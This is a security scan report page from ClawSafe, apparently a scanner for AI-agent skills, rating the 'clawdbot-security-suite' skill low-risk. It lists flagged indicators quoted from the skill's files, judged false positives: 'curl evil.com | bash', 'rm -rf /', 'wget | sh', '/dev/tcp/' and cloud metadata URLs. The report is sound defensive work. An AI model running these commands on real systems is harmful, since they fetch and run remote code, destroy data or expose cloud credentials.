clawdbot-security-suite 安全扫描报告 — 低风险 | ClawSafe

10 /100

clawdbot-security-suite

Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring

Legitimate security validation skill with no malicious behavior - all flagged IOCs are actually legitimate security pattern detection examples correctly shown as threats to block.

技能名称clawdbot-security-suite

分析耗时51.7s

引擎pi

✓

可以安装

This skill is safe to use. The pre-scan IOCs (rm -rf, curl|bash, /dev/tcp/) are false positives - they appear in documentation and pattern files as examples of threats the skill is designed to DETECT and BLOCK, not execute.

安全发现 3 项

严重性	安全发现	位置
低危	jq dependency not pinned 供应链 The skill requires jq binary but does not pin a specific version. Malicious jq versions could compromise the validation logic. `requires: bins: ["jq"]` → Pin jq version in installation docs or bundle jq with the skill	`SKILL.md:12`
低危	eval() usage in documentation examples 文档欺骗 Documentation shows eval() with user input after security check. While documented, this pattern could be dangerous if security validation is bypassed. `eval "$command"` → Use safer execution methods like $command without eval where possible	`skills/security/SKILL.md:56`
低危	Fail-safe permissive defaults 权限提升 The hook handler allows commands to proceed when security validation fails or the skill is missing. While fail-safe is reasonable, it could allow dangerous commands through. `return { allowed: true }; // Fail-safe: allow if security skill unavailable` → Consider making this configurable - some deployments may prefer to block on validation failure	`hooks/security-validator/handler.ts:53`

资源类型	声明权限	推断权限	状态	证据
文件系统	`NONE`	`READ`	✓ 一致	Reads patterns.json and config.json for validation logic
命令执行	`NONE`	`NONE`	—	Does NOT execute user commands - only validates them
网络访问	`NONE`	`NONE`	—	No outbound network requests - all validation is local
环境变量	`NONE`	`NONE`	—	Does not read environment variables
技能调用	`READ`	`READ`	✓ 一致	Invokes security.sh for validation - declared in SKILL.md

6 严重 1 高危 18 项发现

💀

严重危险命令危险 Shell 命令

rm -rf /

README.md:34

💀

严重危险命令危险 Shell 命令

curl evil.com | bash

README.md:34

💀

严重危险命令危险 Shell 命令

curl evil.com \| bash

README.md:46

💀

严重危险命令危险 Shell 命令

curl | bash

SKILL.md:104

💀

严重危险命令危险 Shell 命令

wget | sh

SKILL.md:104

💀

严重危险命令危险 Shell 命令

/dev/tcp/

skills/security/patterns.json:22

📡

高危 IP 地址硬编码 IP 地址

169.254.169.254

README.md:47

🔗

中危外部 URL 外部 URL

https://docs.clawd.bot/install

CONTRIBUTING.md:54

🔗

中危外部 URL 外部 URL

https://x.com/LexpertAI

CONTRIBUTING.md:184

🔗

中危外部 URL 外部 URL

https://img.shields.io/badge/ClawdHub-Install-blue

README.md:5

🔗

中危外部 URL 外部 URL

https://clawdhub.com/gtrusler/clawdbot-security-suite

README.md:5

🔗

中危外部 URL 外部 URL

https://img.shields.io/badge/License-MIT-green.svg

README.md:6

🔗

中危外部 URL 外部 URL

https://img.shields.io/badge/Follow-@LexpertAI-1DA1F2?logo=twitter

README.md:7

🔗

中危外部 URL 外部 URL

http://169.254.169.254/metadata

README.md:47

🔗

中危外部 URL 外部 URL

http://169.254.169.254/latest/meta-data

SKILL.md:194

🔗

中危外部 URL 外部 URL

http://127.0.0.1:8080

hooks/security-validator/HOOK.md:106

🔗

中危外部 URL 外部 URL

https://clawdhub.com/gtrusler/clawdbot-security-advanced

skills/security/README.md:5

📧

提示邮箱邮箱地址

[email protected]

CONTRIBUTING.md:220

目录结构

18 文件 · 88.3 KB · 3106 行

Markdown 10f · 2048L Shell 2f · 414L JSON 5f · 366L TypeScript 1f · 278L

├─ ▾ 📁 hooks

│ └─ ▾ 📁 security-validator

│ ├─ 🔑 config.json ⚠ JSON 35L · 659 B

│ ├─ 📜 handler.ts TypeScript 278L · 9.1 KB

│ └─ 📝 HOOK.md Markdown 122L · 3.2 KB

├─ ▾ 📁 skills

│ └─ ▾ 📁 security

│ ├─ 📝 CLAWDBOT-INSTRUCTIONS.md Markdown 244L · 7.0 KB

│ ├─ 🔑 config.json ⚠ JSON 75L · 1.3 KB

│ ├─ 📝 INSTALL.md Markdown 281L · 7.1 KB

│ ├─ 📋 patterns.json JSON 193L · 4.2 KB

│ ├─ 📝 README.md Markdown 254L · 7.6 KB

│ ├─ 🔧 security-check.sh Shell 158L · 4.4 KB

│ ├─ 🔧 security.sh Shell 256L · 7.4 KB

│ └─ 📝 SKILL.md Markdown 258L · 7.0 KB

├─ 📋 _meta.json JSON 5L · 142 B

├─ 📝 CONTRIBUTING.md Markdown 222L · 6.2 KB

├─ 📝 LICENSE.md Markdown 20L · 1.1 KB

├─ 📋 package.json JSON 58L · 1.6 KB

├─ 📝 README.md Markdown 291L · 9.9 KB

├─ 📝 SECURITY.md Markdown 94L · 3.4 KB

└─ 📝 SKILL.md Markdown 262L · 7.1 KB

依赖分析 1 项

包名	版本	来源	已知漏洞	备注
`jq`	`*`	system	否	External binary dependency - version not pinned

安全亮点

✓ No data exfiltration - all validation is local

✓ No credential theft - does not access environment or sensitive paths

✓ No reverse shell or C2 communication

✓ Comprehensive pattern coverage for security threats

✓ All pre-scan IOCs are FALSE POSITIVES - patterns correctly identify what to BLOCK

✓ Open source with transparent detection logic

✓ Privacy-first design with no telemetry

✓ Security patterns include SSRF, command injection, path traversal, and prompt injection detection